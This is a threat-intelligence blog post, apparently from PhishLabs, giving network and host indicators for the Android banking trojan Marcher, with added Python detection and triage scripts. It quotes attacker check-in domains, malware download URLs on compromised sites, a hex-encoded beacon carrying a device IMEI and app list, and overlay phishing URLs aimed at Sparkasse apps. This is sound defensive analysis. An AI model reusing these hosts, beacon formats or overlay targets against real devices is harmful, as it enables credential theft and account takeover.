The PhishLabs Blog

Android.Trojan.Marcher - Conclusion

Posted by Don Jackson, Director of Threat Intelligence on Jan 29, '16

About Parts One and Two

This post concludes a three-part series analyzing the "Marcher" malware family, which targets the Android platform. Read part one here and part two here. To round out the discussion, this part covers the network and host indicators associated with the trojan.

Network Indicators

Download URLs

In the most recent campaigns, filenames for the Marcher trojan APK file appear to spoof the legitimate Google Play Store app and the Amazon app:

  • playstore.apk
  • amazon.apk
  • Amazon%20.apk or "Amazon .apk" (obfuscated using whitespace)

Download URLs typically follow the format:

http://{compromised-domain}/{path}/cache{32-hex-digits}/{filename}.apk{optional-parameters}

Download links may also carry extra HTTP GET parameters appended to the URL, almost always "sec" and "token" without any values, in one of these forms:

  • ?sec=&token=
  • ?sec=
  • ?sec

The sites hosting the malware are legitimate websites that have been compromised through various web application vulnerabilities, frequently in WordPress installations (note the wp-content and wp-admin paths), as the following samples of actual download URLs show:

  • http://kippiesbe.com/wp-content/plugins/woocommerce-products-slider/js/cache5a1c16360423f7ec195f005769b63913/amazon.apk
  • http://myoptimumgolf.com/wp-admin/css/colors/ectoplasm/cache29f33503d0d1554727cb256794751303/playstore.apk?sec=
  • http://londongoods.com/powermaid/music/cache65f1c1002b1342857ec96dd64121f330/amazon.apk?sec=&token=
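To turn the URL pattern above into something that can be run against proxy or web-server logs, here is an added example (written for this page, not PhishLabs' tooling or Marcher's own code). It classifies URLs on path and query shape alone, since the hosts are compromised legitimate sites and host reputation is not a useful signal. It assumes the 32-hex-digit "cache" directory, the spoofed filenames and the valueless "sec"/"token" parameters described above; the sample list reuses the three URLs quoted in the post plus two hypothetical URLs on example.invalid, one that should match and one that should not.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path shape from the post: .../cache{32 hex digits}/{name}.apk
CACHE_DIR_RE = re.compile(
    r"/cache(?P<cache_id>[0-9a-f]{32})/(?P<apk>[^/?#]+\.apk)$", re.IGNORECASE)

# Filenames seen spoofing the Google Play Store and Amazon apps (from the post).
SPOOFED_NAMES = {"playstore.apk", "amazon.apk"}


def classify_download_url(url):
    """Return a dict of indicators if `url` matches the Marcher download
    pattern, otherwise None."""
    parts = urlsplit(url)
    m = CACHE_DIR_RE.search(parts.path)
    if not m:
        return None
    apk = unquote(m.group("apk"))  # "Amazon%20.apk" -> "Amazon .apk"
    # keep_blank_values turns the bare "?sec" form into [("sec", "")]
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {
        "host": parts.hostname,
        "cache_id": m.group("cache_id").lower(),   # pivot key for hunting related URLs
        "filename": apk,
        # Whitespace-stripped, lowercased name catches the "Amazon .apk" variant.
        "spoofs_known_app": apk.replace(" ", "").lower() in SPOOFED_NAMES,
        "marker_params": {k: v for k, v in params if k in ("sec", "token")},
        "wordpress_path": "/wp-content/" in parts.path or "/wp-admin/" in parts.path,
    }


def scan(urls):
    """Classify a list of URLs (e.g. pulled from proxy logs) and keep the hits."""
    hits = []
    for url in urls:
        info = classify_download_url(url)
        if info:
            hits.append((url, info))
    return hits


# Constructed input: the three download URLs quoted in the post, a hypothetical
# URL with the whitespace-obfuscated filename, and a hypothetical URL that has
# a "cache" directory but no 32-hex-digit suffix and therefore must not match.
SAMPLE_URLS = [
    "http://kippiesbe.com/wp-content/plugins/woocommerce-products-slider/js/cache5a1c16360423f7ec195f005769b63913/amazon.apk",
    "http://myoptimumgolf.com/wp-admin/css/colors/ectoplasm/cache29f33503d0d1554727cb256794751303/playstore.apk?sec=",
    "http://londongoods.com/powermaid/music/cache65f1c1002b1342857ec96dd64121f330/amazon.apk?sec=&token=",
    "http://example.invalid/img/cache00000000000000000000000000000000/Amazon%20.apk?sec",
    "http://example.invalid/downloads/cache/amazon.apk?sec=&token=",
]

if __name__ == "__main__":
    for url, info in scan(SAMPLE_URLS):
        print(url, info)
```

The "cache_id" value is worth keeping as a separate field: the same 32-hex-digit directory name can be searched for across other compromised hosts to find sibling download locations from the same campaign.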

Outbound Check-in Requests

The Marcher trojan is "fire and forget" malware.  Once it is distributed, the attacker sits back passively and collects whatever data is stolen; there is no active command and control channel.  The configuration is embedded in the trojan's code, and the overlay phishing pages themselves are written to send the stolen credentials and other data to the attacker, so the trojan has no concept of a "drop server".

However, Marcher does check into and fetch the fake overlay webpages from a (pre-configured) remote server on-demand, as each monitored package name is detected.  Typically, these webpages are hosted on a server with a domain name controlled by the attacker.  Outbound connections for initial check-in typically follow the pattern:

http://{attacker-created-domain-name}/{path}/get.php

Virtually all Marcher variants use a short path and "get.php", as in this actual example:

http://xasdasd23.com/so/get.php

Initial check-ins are HTTP POST requests with hex-encoded data in the request body:

POST /so/get.php HTTP/1.1

Host: xasdasd23.com

69643D363931316262346136336239343134663130633366353462633237373565373826696E666F3D696D65692533412B3135323031383237343430313539332532432B636F756E7472792533412B75732532432B63656C6C2533412B416E64726F69642532432B616E64726F69642533412B342E302E342532432B6D6F64656C2533412B73616D73756E672B4E657875732B532532432B6170706C69636174696F6E732533412B616E64726F69642537432B616E64726F6964253743636F6D2E616E64726F69642E6261636B7570636F6E6669726D253743636F6D2E616E64726F69642E62726F77736572253743636F6D2E616E64726F69642E63616C6375...

In this case, decoding the hex yields a URL-encoded form body containing an infection ID and device information such as the IMEI, OS version and device model, along with a list of installed applications (truncated for this blog):

id=6911bb4a63b9414f10c3f54bc2775e78&info=imei%3A+152018274401593%2C+country%3A+us%2C+cell%3A+Android%2C+android%3A+4.0.4%2C+model%3A+samsung+Nexus+S%2C+applications%3A+android%7C+android%7Ccom.android.backupconfirm%7Ccom.android.browser%7Ccom.android.calcu...

Occasionally, the check-in URL will also have an "ai" parameter appended:

http://manaclubs.tk/li/get.php?ai=616
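The check-in request is easy to pick out of traffic once you know the shape: a POST to a short path ending in get.php whose body is nothing but hex. The following added example (written for this page, not PhishLabs' or Marcher's code) does three things with that: flags check-in URLs and derives the directory where the overlay pages should live, cheaply tests whether a request body looks like a Marcher check-in, and decodes a body into structured fields. The embedded body is the hex quoted in the post; the capture there ends with "...", so the last package name is cut off and is left that way.

```python
import re
from urllib.parse import urlsplit, parse_qs, parse_qsl

# Check-in URL shape from the post: http://{attacker-domain}/{short path}/get.php[?ai=NNN]
CHECKIN_PATH_RE = re.compile(r"^(?:/[^/]+){1,3}/get\.php$")
HEX_BODY_RE = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")


def classify_checkin_url(url):
    """Return host, overlay base directory and the optional 'ai' parameter for a
    URL that matches the check-in pattern, otherwise None."""
    parts = urlsplit(url)
    if not CHECKIN_PATH_RE.match(parts.path):
        return None
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {
        "host": parts.hostname,
        # Overlay pages sit in a subdirectory below get.php, so this prefix is
        # where the numbered .php pages and named form directories are found.
        "overlay_base": parts.path.rsplit("/", 1)[0] + "/",
        "ai": params.get("ai"),
    }


def looks_like_checkin_body(body):
    """Cheap detector for proxy/IDS use: an all-hex body that decodes to an
    'id=...&info=...' form.  Avoids a full parse on every POST."""
    if not HEX_BODY_RE.match(body):
        return False
    try:
        raw = bytes.fromhex(body).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False
    return raw.startswith("id=") and "&info=" in raw


def decode_checkin_body(body_hex):
    """Hex -> URL-encoded form -> {"id", "device", "applications"}."""
    raw = bytes.fromhex(body_hex).decode("ascii")
    form = parse_qs(raw, keep_blank_values=True)  # handles %XX and "+" for us
    device, applications = {}, []
    # info is "key: value, key: value, ..."; the applications value is a
    # "|"-separated package list, sometimes with stray spaces after "|".
    for item in form["info"][0].split(", "):
        key, _, value = item.partition(": ")
        if key == "applications":
            applications = [p.strip() for p in value.split("|") if p.strip()]
        else:
            device[key] = value
    return {"id": form["id"][0], "device": device, "applications": applications}


# Hex-encoded POST body as quoted in the post (truncated there with "...").
CAPTURED_BODY_HEX = (
    "69643D3639313162623461363362393431346631306333663534626332373735653738"
    "26696E666F3D696D65692533412B3135323031383237343430313539332532432B"
    "636F756E7472792533412B75732532432B63656C6C2533412B416E64726F6964"
    "2532432B616E64726F69642533412B342E302E342532432B6D6F64656C2533412B"
    "73616D73756E672B4E657875732B532532432B6170706C69636174696F6E73"
    "2533412B616E64726F69642537432B616E64726F6964253743"
    "636F6D2E616E64726F69642E6261636B7570636F6E6669726D253743"
    "636F6D2E616E64726F69642E62726F77736572253743"
    "636F6D2E616E64726F69642E63616C6375"
)

if __name__ == "__main__":
    print(classify_checkin_url("http://xasdasd23.com/so/get.php"))
    print(classify_checkin_url("http://manaclubs.tk/li/get.php?ai=616"))
    if looks_like_checkin_body(CAPTURED_BODY_HEX):
        print(decode_checkin_body(CAPTURED_BODY_HEX))
```

The decoded "applications" list is the part worth retaining from a capture: it tells you which banking apps on the victim's device Marcher will try to overlay, and the "id" value ties later overlay fetches from the same device back to this check-in.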

The breakdown of observed registration/check-in servers by country is illustrated in the chart below. 


Chart 1 - Breakdown of Marcher Registration/Check-in URLs by country

Fetching of fake webpages

The URLs of the fake overlay pages for each targeted app are embedded in the Marcher trojan's executable code.  The pages are typically in a subdirectory under the location of the get.php file from the check-in URL, as in this actual example:

http://xasdasd23.com/so/l/05.php

The overlay pages are typically PHP pages named with a zero-padded, two-digit numbering scheme ("01.php", "02.php", etc.).  However, some of the more interactive, multi-step forms live in their own directory.  For example, the following configuration data structure (a JSON array that appears in the code as an escaped string literal):

[{\"to\": \"com.starfinanz.smob.android.sfinanzstatus\",\"body\": \" http://xasdasd23.com/so/l/sparkasse/\"},{\"to\": \"com.starfinanz.smob.android.sbanking\",\"body\": \" http://xasdasd23.com/so/l/sparkasse/\"},{\"to\": \"de.sparkasse\",\"body\": \" http://xasdasd23.com/so/l/sparkasse/\"}...

... tells Marcher to look for apps belonging to Star Finanz and Sparkasse and overlay the webpage at "http://xasdasd23.com/so/l/sparkasse/" instead of a numbered PHP page.
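The configuration string above is the most useful artifact to pull out of a sample, because it lists both the targeted package names and the overlay URLs to take down. Here is an added example (written for this page, not part of Marcher or PhishLabs' tooling) that parses it from the escaped form in which it appears in decompiled code. The embedded string is constructed from the three entries visible above, since the original is truncated; the handling of relative "body" values (resolved against the check-in URL) is an assumption for the numbered-page case and is not something the post states.

```python
import json
from urllib.parse import urljoin

# Constructed from the three entries visible in the post's truncated
# configuration string, kept in the backslash-escaped form of the code literal.
EMBEDDED_CONFIG = (
    '[{\\"to\\": \\"com.starfinanz.smob.android.sfinanzstatus\\",'
    '\\"body\\": \\" http://xasdasd23.com/so/l/sparkasse/\\"},'
    '{\\"to\\": \\"com.starfinanz.smob.android.sbanking\\",'
    '\\"body\\": \\" http://xasdasd23.com/so/l/sparkasse/\\"},'
    '{\\"to\\": \\"de.sparkasse\\",'
    '\\"body\\": \\" http://xasdasd23.com/so/l/sparkasse/\\"}]'
)


def unescape_literal(s):
    """Turn the escaped form from decompiled code (\\" for ") back into JSON.
    A no-op for input that is already plain JSON."""
    return s.replace('\\"', '"')


def parse_overlay_config(literal, checkin_url=None):
    """Map each monitored package name to the overlay URL Marcher fetches.
    'body' values are stripped of the stray leading space seen in the sample.
    Assumption: a relative body (e.g. a numbered page) is resolved against the
    check-in URL's directory when one is supplied."""
    targets = {}
    for entry in json.loads(unescape_literal(literal)):
        body = entry["body"].strip()
        if checkin_url:
            body = urljoin(checkin_url, body)
        targets[entry["to"]] = body
    return targets


def overlay_urls(targets):
    """Distinct overlay URLs, i.e. the hosting to block or take down."""
    return sorted(set(targets.values()))


if __name__ == "__main__":
    targets = parse_overlay_config(EMBEDDED_CONFIG)
    for package, url in targets.items():
        print(f"{package} -> {url}")
    print(overlay_urls(targets))
```

The package names on the left side of the map double as a host indicator: Marcher has to name every app it watches for, so an otherwise innocuous app whose code contains a list of banking package names deserves a closer look.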

Many of the overlay HTML pages contain a comment similar to the following, left behind by the HTTrack Website Copier used to clone the pages from another site, which makes the comment itself a handy content indicator:

<!-- Mirrored from copycat.su/formos/05.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 21 Jul 2015 12:41:12 GMT -->

Host Indicators (on the Device)

File Sizes

The Marcher APK file is much smaller than those of the legitimate apps it impersonates.  The latest Marcher samples are approximately 1.35 MB; others still in the wild are about 1.1 MB, and older, defunct versions are smaller still.  The legitimate apps Marcher has impersonated range from approximately 5 MB to more than 30 MB.

Package Characteristics

On the device itself, Marcher is installed as a standard Android package using only "assets" (configuration files, images and icons, etc.) and Dalvik bytecode (the cross-platform executable instructions).  There is no platform (ARM, x86, MIPS, etc.) native code.

The application package is signed; Android requires a technically valid signature to install any APK, but it does not require the signing certificate to chain to a trusted certificate authority (CA).  All specimens examined use a self-signed certificate that does not chain to any trusted CA.  The "CN" (common name) of the "Issuer" and "Subject" fields typically match, as expected for a self-signed certificate.  In some samples the value appears arbitrary, such as "newkiss"; other samples have spoofed "Google, Inc.", for example.  In the latter case the certificate is still self-signed, so it does not verify against Google's genuine signing certificate, and the spoofed name is itself an indicator.

The package name can vary, and the names used so far appear to be arbitrarily chosen.  As an example, in one sample (MD5: c0596e35bd67ccc05c682e7a9c5befa0), the main package name is simply "com.fineproj".

All Marcher samples to date have a specific sub-package name, "googleplay", directly beneath the main package. 

Activities

All Marcher samples to date have a specific set of "activity" names.  For example:

  • fineproj.googleplay.DialogGooglePlayCard
  • fineproj.googleplay.DialogGooglePlayPassword
  • fineproj.googleplay.DialogCustomWeb
  • fineproj.googleplay.DialogWebView
  • fineproj.googleplay.FreeDialog

These names reflect Marcher's original purpose in its very first version: phishing Google Play credentials.

Services

All Marcher samples to date also have a standard set of services:

  • fineproj.MainService
  • fineproj.USSDService
  • fineproj.googleplay.GPService
 

Required Android Versions

All Marcher samples to date require at least Android 2.1 "Eclair" (API level 7, i.e. minSdkVersion 7) to run correctly.  The target version (targetSdkVersion) has increased as new versions of Android have been released; the latest samples target Android 5.1 "Lollipop" (API level 22).  PhishLabs has not yet observed Marcher samples that target Android 6.0 "Marshmallow" (API level 23), but there is no apparent reason Marcher would be incompatible with that version.  The target version simply appears to track the highest platform version supported by the malware developer's Android SDK installation.

Permissions

The full set of specific permissions required by Marcher is:

  • permission.SEND_SMS (send SMS messages)
  • permission.USES_POLICY_FORCE_LOCK (a device-administrator policy rather than a standard manifest permission, which is why automated tools report it as unknown; it lets an app granted device-administrator rights lock the screen)
  • permission.RECEIVE_BOOT_COMPLETED (automatically start at boot)
  • permission.READ_PHONE_STATE (read phone state and identity)
  • permission.VIBRATE (control vibrator)
  • permission.DEVICE_POWER (turn phone on or off)
  • permission.ACCESS_NETWORK_STATE (view network status)
  • permission.WAKE_LOCK (prevent phone from sleeping)
  • permission.GET_TASKS (retrieve running applications)
  • permission.CALL_PHONE (directly call phone numbers)
  • permission.WRITE_SETTINGS (modify global system settings)
  • permission.RECEIVE_SMS (receive SMS)
  • permission.INTERNET (full Internet access)
  • permission.READ_CONTACTS (read contact data)

Marcher requests permissions that can be abused to receive and send SMS messages (including to premium-rate numbers) and place calls, both of which can be used to make payments the victim never authorized; to see which app is in the foreground (GET_TASKS, needed to trigger the overlays); to reach the Internet to fetch the phishing pages; and to read private information such as contacts and device identifiers.
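The host indicators from the Package Characteristics, Activities, Services and Permissions sections above can be checked without a full decompile. The following added example (written for this page, not PhishLabs' or Marcher's code) inspects an APK as a zip: file size, absence of native code under lib/, the signature block files, and whether the identifier strings named above occur in the DEX, which works because Dalvik bytecode stores class descriptors and string constants in clear text (assumption: no string obfuscation). It also parses `aapt dump permissions` output and scores it against the permission set listed above. The APK and the aapt output are constructed stand-ins, not real samples.

```python
import io
import re
import zipfile

# Identifier and literal strings from the post: sub-package, activity and
# service names plus the check-in endpoint.
DEX_INDICATORS = [b"googleplay", b"GPService", b"USSDService", b"MainService",
                  b"DialogGooglePlayCard", b"DialogGooglePlayPassword",
                  b"DialogCustomWeb", b"DialogWebView", b"FreeDialog", b"get.php"]

# Manifest permissions from the post.  USES_POLICY_FORCE_LOCK is a
# device-administrator policy, not a manifest permission, so it is left out.
MARCHER_PERMISSIONS = {
    "android.permission." + p for p in (
        "SEND_SMS", "RECEIVE_BOOT_COMPLETED", "READ_PHONE_STATE", "VIBRATE",
        "DEVICE_POWER", "ACCESS_NETWORK_STATE", "WAKE_LOCK", "GET_TASKS",
        "CALL_PHONE", "WRITE_SETTINGS", "RECEIVE_SMS", "INTERNET", "READ_CONTACTS")
}


def triage_apk(data):
    """Host indicators from raw APK bytes: size, native code, signature files,
    and which indicator strings occur in the DEX."""
    zf = zipfile.ZipFile(io.BytesIO(data))
    names = zf.namelist()
    dex = b"".join(zf.read(n) for n in names if re.fullmatch(r"classes\d*\.dex", n))
    return {
        "size_mb": round(len(data) / 1e6, 2),
        # Legitimate Play Store / Amazon apps run 5-30 MB; Marcher is ~1.1-1.35 MB.
        "small_for_claimed_app": len(data) < 2_000_000,
        "native_code": any(n.startswith("lib/") for n in names),
        "signature_files": [n for n in names if n.startswith("META-INF/")
                            and n.endswith((".RSA", ".DSA", ".EC"))],
        "dex_indicators": [s.decode() for s in DEX_INDICATORS if s in dex],
    }


# Matches both "uses-permission: name='X'" (current aapt) and "uses-permission: X".
PERM_LINE_RE = re.compile(r"uses-permission:\s*(?:name=')?([\w.]+)'?")


def permissions_from_aapt(output):
    """Permission names from `aapt dump permissions app.apk` output."""
    return set(PERM_LINE_RE.findall(output))


def permission_overlap(perms):
    """(fraction of the Marcher permission set requested, sorted overlap)."""
    common = perms & MARCHER_PERMISSIONS
    return len(common) / len(MARCHER_PERMISSIONS), sorted(common)


def build_sample_apk():
    """Constructed stand-in, not a real sample: a zip with the layout the post
    describes (assets + DEX, no lib/, a signature block) and a fake classes.dex
    that only carries a few indicator strings."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")  # binary XML magic only
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00".join([
            b"Lcom/fineproj/googleplay/GPService;",
            b"Lcom/fineproj/googleplay/DialogGooglePlayCard;",
            b"Lcom/fineproj/USSDService;",
            b"/so/get.php"]))
        zf.writestr("assets/config.txt", b"{}")
        zf.writestr("META-INF/CERT.RSA", b"\x30\x82")  # DER SEQUENCE prefix only
    return buf.getvalue()


# Constructed `aapt dump permissions` output for the stand-in package.
AAPT_SAMPLE = """package: com.fineproj
uses-permission: name='android.permission.SEND_SMS'
uses-permission: name='android.permission.RECEIVE_BOOT_COMPLETED'
uses-permission: name='android.permission.READ_PHONE_STATE'
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.RECEIVE_SMS'
uses-permission: name='android.permission.GET_TASKS'
uses-permission: android.permission.READ_CONTACTS
"""

if __name__ == "__main__":
    report = triage_apk(build_sample_apk())
    ratio, common = permission_overlap(permissions_from_aapt(AAPT_SAMPLE))
    print(report)
    print(f"{ratio:.0%} of the Marcher permission set requested: {common}")
```

For the certificate itself, `apksigner verify --print-certs app.apk` from the Android build-tools prints the signer DN, which is where the arbitrary "newkiss" or spoofed "Google, Inc." names show up; a DN claiming Google on a self-signed certificate is a stronger signal than any single permission.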

Conclusion

The Marcher trojan for Android platforms is available for purchase on the cyber underground.  It is widely distributed and used by different threat actors to phish login credentials and other sensitive data from infected users of popular mobile banking and finance apps.  It's fairly polished and successful as a tool used by cybercriminals to facilitate account takeover.  However, there are certain code artifacts and network indicators that can be used to identify the mobile malware and initiate takedown of hosting infrastructure.  For more information contact PhishLabs.

Topics: Phishing, Malware, Threat Intelligence, Android, Banking Trojan
